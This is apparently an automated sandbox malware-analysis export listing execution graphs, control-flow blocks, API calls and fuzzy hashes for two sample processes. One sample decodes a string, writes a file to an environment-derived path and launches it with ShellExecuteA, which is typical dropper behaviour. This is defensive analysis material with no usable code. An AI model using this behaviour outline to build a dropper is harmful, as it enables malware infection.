• Instruction ID: 4d2158d97946b4596082ce787f036043b811fad725a13a3497fac4afa0c767b2
• Opcode Fuzzy Hash: 07ed17d8420c9e6ebcf29ebd8cf6512b062f31e25bdd3c980be16004a988f261
• Instruction Fuzzy Hash: F7F09670E44704AFFB26EFB4DD1199AB7EDFB49700B514570B810C3750D670AE14D925

Execution Graph

Execution Coverage: 25%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 36
Total number of Limit Nodes: 2

Execution graph (interactive graph in the original; nodes and edges recovered from the page data):
• 401000 malloc -> 401031
• 401453 _XcptFilter (no recorded edges)
• 401475 memset -> 58c000 -> 4014a2 (__set_app_type, _controlfp, __getmainargs) -> 4013ff -> 40141a -> 40108c (memset, memset) -> 401141
• 401141 -> 40134e -> 401443 -> 401518 exit
• 401141 -> 401164 strcmp -> 401191 (EntryPoint, strcpy) or -> 4011db (EntryPoint, getenv, EntryPoint, sprintf); both -> 40126b (fopen, EntryPoint, fwrite, fclose)
• 40126b -> 401310 (EntryPoint, ShellExecuteA) -> 401349 -> 401443; 40126b -> 401349 directly
• 401155 -> 401141 and 401155 -> 401164: a second entry into the same 401141 / 401164 / 40126b / 401310 / 401349 path
• 401526 _controlfp -> 40108c (15 API calls) -> 401580
• 4015d7 SetUnhandledExceptionFilter (no recorded edges)
• 4bf794 <-> 4bf7a0; 4bf7a0 -> 4bf8b4 GetPEB; 4bf7a0 -> 4bf7e1

                                                                                                                Callgraph

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000001.2336669270.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000018.00000001.2336669270.0000000000479000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                • Associated: 00000018.00000001.2336669270.000000000058C000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                • String ID: %s\%s
                                                                                                                • API String ID: 2742963760-4073750446
                                                                                                                • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                                • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000001.2336669270.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000018.00000001.2336669270.0000000000479000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                • Associated: 00000018.00000001.2336669270.000000000058C000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2992075992-0
                                                                                                                • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                                • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000001.2336669270.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000018.00000001.2336669270.0000000000479000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                • Associated: 00000018.00000001.2336669270.000000000058C000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1611591150-0
                                                                                                                • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                                • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000001.2336669270.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000018.00000001.2336669270.0000000000479000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                • Associated: 00000018.00000001.2336669270.000000000058C000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                                • API String ID: 2803490479-2443507578
                                                                                                                • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000001.2336669270.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000018.00000001.2336669270.0000000000479000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                • Associated: 00000018.00000001.2336669270.000000000058C000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_1_400000_lxsyrsiW.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 4108700736-0
                                                                                                                • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                                • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

                                                                                                                Execution Graph

                                                                                                                Execution Coverage: 11.8%
                                                                                                                Dynamic/Decrypted Code Coverage: 100%
                                                                                                                Signature Coverage: 0%
                                                                                                                Total number of Nodes: 122
                                                                                                                Total number of Limit Nodes: 17
                                                                                                                execution_graph 23201 d70848 23202 d7084e 23201->23202 23203 d7091b 23202->23203 23206 d71487 23202->23206 23213 d7137f 23202->23213 23207 d71396 23206->23207 23208 d71484 23207->23208 23212 d71487 4 API calls 23207->23212 23220 d77d90 23207->23220 23224 d77c9c 23207->23224 23228 d77ea8 23207->23228 23208->23202 23212->23207 23214 d71383 23213->23214 23215 d7131a 23213->23215 23214->23215 23216 d71487 4 API calls 23214->23216 23217 d77d90 4 API calls 23214->23217 23218 d77c9c 4 API calls 23214->23218 23219 d77ea8 4 API calls 23214->23219 23215->23202 23216->23214 23217->23214 23218->23214 23219->23214 23221 d77da6 23220->23221 23222 d77e57 23221->23222 23233 d78718 23221->23233 23222->23207 23225 d77da6 23224->23225 23226 d77e57 23225->23226 23227 d78718 4 API calls 23225->23227 23226->23207 23227->23225 23229 d77eb2 23228->23229 23230 d77ecc 23229->23230 23335 66bfb58 23229->23335 23341 66bfb68 23229->23341 23230->23207 23234 d7871d 23233->23234 23235 d78f2d 23234->23235 23239 d7a04b 23234->23239 23244 d79fa8 23234->23244 23249 d79f98 23234->23249 23235->23221 23240 d7a020 23239->23240 23241 d7a061 23240->23241 23254 d7a098 23240->23254 23260 d7a0a8 23240->23260 23246 d79fc5 23244->23246 23245 d7a061 23246->23245 23247 d7a098 4 API calls 23246->23247 23248 d7a0a8 4 API calls 23246->23248 23247->23246 23248->23246 23251 d79fc5 23249->23251 23250 d7a061 23251->23250 23252 d7a098 4 API calls 23251->23252 23253 d7a0a8 4 API calls 23251->23253 23252->23251 23253->23251 23256 d7a0a8 23254->23256 23255 d7a182 23256->23255 23266 d7a4d6 23256->23266 23274 d7a2d8 23256->23274 23282 d7a1b2 23256->23282 23262 d7a0c2 23260->23262 23261 d7a182 23262->23261 23263 d7a4d6 4 API calls 23262->23263 23264 d7a1b2 4 API calls 23262->23264 23265 d7a2d8 4 API calls 23262->23265 23263->23262 23264->23262 23265->23262 23268 d7a1e1 23266->23268 23267 d7a505 23267->23256 
23268->23267 23269 d7a4d6 4 API calls 23268->23269 23270 d7a1b2 4 API calls 23268->23270 23271 d7a2d8 4 API calls 23268->23271 23290 d7de38 23268->23290 23295 d7de28 23268->23295 23269->23268 23270->23268 23271->23268 23276 d7a1e1 23274->23276 23275 d7a505 23275->23256 23276->23275 23277 d7de38 4 API calls 23276->23277 23278 d7de28 4 API calls 23276->23278 23279 d7a4d6 4 API calls 23276->23279 23280 d7a1b2 4 API calls 23276->23280 23281 d7a2d8 4 API calls 23276->23281 23277->23276 23278->23276 23279->23276 23280->23276 23281->23276 23284 d7a1e1 23282->23284 23283 d7a505 23283->23256 23284->23283 23285 d7de38 4 API calls 23284->23285 23286 d7de28 4 API calls 23284->23286 23287 d7a4d6 4 API calls 23284->23287 23288 d7a1b2 4 API calls 23284->23288 23289 d7a2d8 4 API calls 23284->23289 23285->23284 23286->23284 23287->23284 23288->23284 23289->23284 23291 d7dea7 23290->23291 23292 d7de47 23290->23292 23291->23292 23301 d7eed0 23291->23301 23292->23268 23296 d7de33 23295->23296 23297 d7dcf9 23295->23297 23298 d7de47 23296->23298 23300 d7eed0 4 API calls 23296->23300 23297->23268 23298->23268 23299 d7e37e 23299->23268 23300->23299 23305 d7ef18 23301->23305 23316 d7ef08 23301->23316 23302 d7e37e 23302->23268 23306 d7ef25 23305->23306 23307 d7ef4d 23305->23307 23306->23302 23314 d7ef18 3 API calls 23307->23314 23315 d7ef08 3 API calls 23307->23315 23327 d7efe8 23307->23327 23330 d7efa8 23307->23330 23308 d7ef6e 23308->23302 23309 d7ef6a 23309->23308 23310 d7f036 GlobalMemoryStatusEx 23309->23310 23311 d7f066 23310->23311 23311->23302 23314->23309 23315->23309 23317 d7ef18 23316->23317 23318 d7ef25 23317->23318 23323 d7efe8 GlobalMemoryStatusEx 23317->23323 23324 d7efa8 GlobalMemoryStatusEx 23317->23324 23325 d7ef18 3 API calls 23317->23325 23326 d7ef08 3 API calls 23317->23326 23318->23302 23319 d7ef6e 23319->23302 23320 d7ef6a 23320->23319 23321 d7f036 GlobalMemoryStatusEx 23320->23321 23322 d7f066 23321->23322 23322->23302 23323->23320 23324->23320 23325->23320 
23326->23320 23328 d7f036 GlobalMemoryStatusEx 23327->23328 23329 d7f066 23328->23329 23329->23309 23332 d7efc5 23330->23332 23331 d7efd3 23331->23309 23332->23331 23333 d7f036 GlobalMemoryStatusEx 23332->23333 23334 d7f066 23333->23334 23334->23309 23337 66bfb7d 23335->23337 23336 66bfd92 23336->23230 23337->23336 23338 d7e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23337->23338 23339 d7de38 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23337->23339 23340 d7de28 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23337->23340 23338->23337 23339->23337 23340->23337 23343 66bfb7d 23341->23343 23342 66bfd92 23342->23230 23343->23342 23344 d7de28 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23343->23344 23345 d7e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23343->23345 23346 d7de38 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 23343->23346 23344->23343 23345->23343 23346->23343
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9bedf0b8937e330ba69f7485ed5be4a7988ec03783757ee8fa8d90febb46921d
                                                                                                                • Instruction ID: 34b24cba5341d1176bf875718e99514f6b90e347b1b20b537ce2f7f1d54bd7b4
                                                                                                                • Opcode Fuzzy Hash: 9bedf0b8937e330ba69f7485ed5be4a7988ec03783757ee8fa8d90febb46921d
                                                                                                                • Instruction Fuzzy Hash: AFA25430A00204CFDBA4DB68C594BADB7F6FB49314F5494A9D449AB361DB35EE86CF80
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9e9cfb63d1a6cee353562f184f78b0ac35e60b6dfdd2cd032ab17561ee4db9de
                                                                                                                • Instruction ID: 0491ad211a8fedd1e054cb885c5e8a2f92bdc112f824ff8b136fde577ab5425e
                                                                                                                • Opcode Fuzzy Hash: 9e9cfb63d1a6cee353562f184f78b0ac35e60b6dfdd2cd032ab17561ee4db9de
                                                                                                                • Instruction Fuzzy Hash: 0F629D30A00205CFDB54DB68D594AADB7F2FF88314F149469E80AEB355DB35ED86CB90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1339 66bc2a0-66bc2c0 1340 66bc2c2-66bc2c5 1339->1340 1341 66bc2d2-66bc2d5 1340->1341 1342 66bc2c7-66bc2cd 1340->1342 1343 66bc2dc-66bc2e5 1341->1343 1344 66bc2d7-66bc2da 1341->1344 1342->1341 1346 66bc2eb 1343->1346 1347 66bc500-66bc509 1343->1347 1344->1343 1345 66bc2f0-66bc2f3 1344->1345 1348 66bc2f5-66bc30f 1345->1348 1349 66bc314-66bc317 1345->1349 1346->1345 1350 66bc50f-66bc516 1347->1350 1351 66bc637-66bc66d 1347->1351 1348->1349 1352 66bc319-66bc31c 1349->1352 1353 66bc32e-66bc331 1349->1353 1354 66bc51b-66bc51e 1350->1354 1366 66bc66f-66bc672 1351->1366 1352->1351 1357 66bc322-66bc329 1352->1357 1360 66bc34a-66bc34d 1353->1360 1361 66bc333-66bc345 1353->1361 1358 66bc541-66bc544 1354->1358 1359 66bc520-66bc53c 1354->1359 1357->1353 1364 66bc54c-66bc54f 1358->1364 1365 66bc546-66bc547 1358->1365 1359->1358 1362 66bc37a-66bc37d 1360->1362 1363 66bc34f-66bc375 1360->1363 1361->1360 1371 66bc3df-66bc3e2 1362->1371 1372 66bc37f-66bc3da 1362->1372 1363->1362 1367 66bc551-66bc56b 1364->1367 1368 66bc570-66bc573 1364->1368 1365->1364 1369 66bc692-66bc695 1366->1369 1370 66bc674-66bc68d 1366->1370 1367->1368 1376 66bc57d-66bc580 1368->1376 1377 66bc575-66bc578 1368->1377 1380 66bc6ac-66bc6af 1369->1380 1381 66bc697-66bc6a5 1369->1381 1370->1369 1378 66bc40e-66bc411 1371->1378 1379 66bc3e4-66bc409 1371->1379 1372->1371 1386 66bc4a1-66bc4a4 1376->1386 1387 66bc586-66bc589 1376->1387 1377->1376 1382 66bc43e-66bc441 1378->1382 1383 66bc413-66bc439 1378->1383 1379->1378 1389 66bc6d2-66bc6d5 1380->1389 1390 66bc6b1-66bc6cd 1380->1390 1404 66bc6e7-66bc700 1381->1404 1405 66bc6a7 1381->1405 1400 66bc44e-66bc451 1382->1400 1401 66bc443-66bc449 1382->1401 1383->1382 1386->1352 1392 66bc4aa 1386->1392 1393 66bc58b-66bc5a5 1387->1393 1394 66bc5aa-66bc5ad 1387->1394 1398 66bc6e2-66bc6e5 1389->1398 1399 66bc6d7-66bc6e1 1389->1399 1390->1389 1403 
66bc4af-66bc4b2 1392->1403 1393->1394 1406 66bc5af-66bc5b2 1394->1406 1407 66bc5b7-66bc5ba 1394->1407 1398->1404 1410 66bc70d-66bc70f 1398->1410 1411 66bc458-66bc45b 1400->1411 1412 66bc453-66bc455 1400->1412 1401->1400 1414 66bc4ce-66bc4d1 1403->1414 1415 66bc4b4-66bc4c3 1403->1415 1425 66bc71f-66bc72b 1404->1425 1456 66bc702-66bc70c 1404->1456 1405->1380 1406->1407 1418 66bc5db-66bc5de 1407->1418 1419 66bc5bc-66bc5d6 1407->1419 1423 66bc711 1410->1423 1424 66bc716-66bc719 1410->1424 1421 66bc45d-66bc482 1411->1421 1422 66bc487-66bc48a 1411->1422 1412->1411 1428 66bc4fb-66bc4fe 1414->1428 1429 66bc4d3-66bc4f6 1414->1429 1415->1365 1448 66bc4c9 1415->1448 1431 66bc5e8-66bc5eb 1418->1431 1432 66bc5e0-66bc5e5 1418->1432 1419->1418 1421->1422 1426 66bc49c-66bc49f 1422->1426 1427 66bc48c-66bc497 1422->1427 1423->1424 1424->1366 1424->1425 1436 66bc8cb-66bc8d5 1425->1436 1437 66bc731-66bc73a 1425->1437 1426->1386 1426->1403 1427->1426 1428->1347 1428->1354 1429->1428 1441 66bc5ff-66bc602 1431->1441 1442 66bc5ed-66bc5f4 1431->1442 1432->1431 1445 66bc740-66bc760 1437->1445 1446 66bc8d6-66bc90e 1437->1446 1452 66bc61a-66bc61c 1441->1452 1453 66bc604-66bc615 1441->1453 1442->1377 1451 66bc5fa 1442->1451 1472 66bc8b9-66bc8c5 1445->1472 1473 66bc766-66bc76f 1445->1473 1466 66bc910-66bc913 1446->1466 1448->1414 1451->1441 1457 66bc61e 1452->1457 1458 66bc623-66bc626 1452->1458 1453->1452 1457->1458 1458->1340 1464 66bc62c-66bc636 1458->1464 1470 66bc919-66bc927 1466->1470 1471 66bcacf-66bcad2 1466->1471 1478 66bc92e-66bc930 1470->1478 1474 66bcaf5-66bcaf7 1471->1474 1475 66bcad4-66bcaf0 1471->1475 1472->1436 1472->1437 1473->1446 1477 66bc775-66bc7a4 call 66b6698 1473->1477 1479 66bcaf9 1474->1479 1480 66bcafe-66bcb01 1474->1480 1475->1474 1496 66bc7e6-66bc7fc 1477->1496 1497 66bc7a6-66bc7de 1477->1497 1483 66bc932-66bc935 1478->1483 1484 66bc947-66bc971 1478->1484 1479->1480 1480->1466 1481 66bcb07-66bcb10 1480->1481 1483->1481 1491 66bc977-66bc980 1484->1491 1492 
66bcac4-66bcace 1484->1492 1494 66bca9d-66bcac2 1491->1494 1495 66bc986-66bca95 call 66b6698 1491->1495 1494->1481 1495->1491 1546 66bca9b 1495->1546 1502 66bc81a-66bc830 1496->1502 1503 66bc7fe-66bc812 1496->1503 1497->1496 1509 66bc84e-66bc861 1502->1509 1510 66bc832-66bc846 1502->1510 1503->1502 1518 66bc86f 1509->1518 1519 66bc863-66bc86d 1509->1519 1510->1509 1520 66bc874-66bc876 1518->1520 1519->1520 1522 66bc878-66bc87d 1520->1522 1523 66bc8a7-66bc8b3 1520->1523 1524 66bc88b 1522->1524 1525 66bc87f-66bc889 1522->1525 1523->1472 1523->1473 1527 66bc890-66bc892 1524->1527 1525->1527 1527->1523 1528 66bc894-66bc8a0 1527->1528 1528->1523 1546->1492
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0027d9879a0da3e83b385098c34ea8fdb5bd79b2ccd737741c79d258e735079a
                                                                                                                • Instruction ID: 157ef6e46b82a1bcc611d739a73575193f5ee93d6a9b7fdfc5fdcf7f7e8d11e6
                                                                                                                • Opcode Fuzzy Hash: 0027d9879a0da3e83b385098c34ea8fdb5bd79b2ccd737741c79d258e735079a
                                                                                                                • Instruction Fuzzy Hash: DE327E34E00209DFDF54EB68D990BAEB7B2EB88314F109529D506EB755DB31ED82CB90

                                                                                                                 Control-flow Graph
                                                                                                                 Control-flow graph: function basic blocks from 66b56b8 through 66b5dd6; the rendered graph, its edge layout and the executed/not-executed colouring are not recoverable in text.
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 373a991bc572fbc8c8c8d8b5ff29ae44b993ec29df9efae60a3c3c6aa8d376ee
                                                                                                                • Instruction ID: 66de2a99d6d51c4b86a77818314944ff85f284173a9b5aad02cb552b7f9964ba
                                                                                                                • Opcode Fuzzy Hash: 373a991bc572fbc8c8c8d8b5ff29ae44b993ec29df9efae60a3c3c6aa8d376ee
                                                                                                                • Instruction Fuzzy Hash: E222CF31F10255DBDB60DF64D8846EEB7B2EF85310F24942AD856AB385DB34EC82CB90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f3386fc77ab90fccc454fa51b9b4fa560515ab7910afeb1582a3fab5b3452ae9
                                                                                                                • Instruction ID: 8a3f98140cf58824ccebfed313155257a6f078c5aeba7edd445cc0f68008392b
                                                                                                                • Opcode Fuzzy Hash: f3386fc77ab90fccc454fa51b9b4fa560515ab7910afeb1582a3fab5b3452ae9
                                                                                                                • Instruction Fuzzy Hash: FA028B30B01216CFDB54EF64D990AAEB7E6FF84304F249929D516DB385DB35EC828B90

                                                                                                                 Control-flow Graph
                                                                                                                 Control-flow graph: function at d7ef18 (blocks through d7f095); block d7ef65 calls d7efe8, d7efa8, d7ef18 and d7ef08, and block d7efd7-d7f064 calls GlobalMemoryStatusEx; the rendered graph and the executed/not-executed colouring are not recoverable in text.
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2433496043.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_d70000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 32a09be5069a7563a46ee2c1063318ab13482966799cc65da4181dfa4a41d2d2
                                                                                                                • Instruction ID: c758ae69941162c3407577888d8761ac4cc54771f2fc6e8789d4a8e327671b0e
                                                                                                                • Opcode Fuzzy Hash: 32a09be5069a7563a46ee2c1063318ab13482966799cc65da4181dfa4a41d2d2
                                                                                                                • Instruction Fuzzy Hash: 60410072D0035A9FDB14DFA9D8407EEBBF5EF89310F18856AD518A7240EB789845CBA0

                                                                                                                 Control-flow Graph
                                                                                                                 Control-flow graph: function at d7efe8 (blocks through d7f095); block d7efe8-d7f064 calls GlobalMemoryStatusEx; the rendered graph and the executed/not-executed colouring are not recoverable in text.
                                                                                                                APIs
                                                                                                                • GlobalMemoryStatusEx.KERNELBASE ref: 00D7F057
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2433496043.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_d70000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1890195054-0
                                                                                                                • Opcode ID: 82d0576193ed7c3fe2862dba73604e3eaf79fb7e9ffb37f75954ed089f71e962
                                                                                                                • Instruction ID: b60a75d94db6f4cca827d7eee1be663e7817fd50cfa402cb3e7fe53226a68cea
                                                                                                                • Opcode Fuzzy Hash: 82d0576193ed7c3fe2862dba73604e3eaf79fb7e9ffb37f75954ed089f71e962
                                                                                                                • Instruction Fuzzy Hash: 1E1114B1C0065ADFDB20DFAAC445BDEFBB4AF48310F15816AE818B7240D778A950CFA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ba277eae3dccbe8946dec09c44acddf18a1c883b0f0b01403ef1b0b905f802be
                                                                                                                • Instruction ID: 477462eb82cdd9ccd12763c6e50b3c234fafb725235348af794512f98d38fb5a
                                                                                                                • Opcode Fuzzy Hash: ba277eae3dccbe8946dec09c44acddf18a1c883b0f0b01403ef1b0b905f802be
                                                                                                                • Instruction Fuzzy Hash: 6C023830E0020ACFDBA4DF68D580AADB7B2FB85310F20992AD415DB355DF75E986CB91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6960cd1c228d143b0995d0b748c70476bc4c5e09d808e74ee1553e47657b114e
                                                                                                                • Instruction ID: 34604d05f5c9f2c1ee7e6e2dd16ccaad4f38df8ca9e0301b74b60fc9759bbbfe
                                                                                                                • Opcode Fuzzy Hash: 6960cd1c228d143b0995d0b748c70476bc4c5e09d808e74ee1553e47657b114e
                                                                                                                • Instruction Fuzzy Hash: 30914F30F1025ACFDB94DB64D9507AEB3F6AF85300F108669C90AEB744EF709D868B95
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.2495719821.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_66b0000_neworigin.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48fcc1f4b7db575cf25022d04574f2bfb501710d1cffb40a5c251d7ad4fb0b75
                                                                                                                • Instruction ID: 916d73dc03464505c922228fa51855d6434f7ae706c9e3e46d5ad311a980fda2
                                                                                                                • Opcode Fuzzy Hash: 48fcc1f4b7db575cf25022d04574f2bfb501710d1cffb40a5c251d7ad4fb0b75
                                                                                                                • Instruction Fuzzy Hash: 7A61E271F004228BDF509A7EC884AAFBAD7AFC4620F15503AD80ADB3A0DE65DD4287C5
                                                                                                                Memory Dump Source
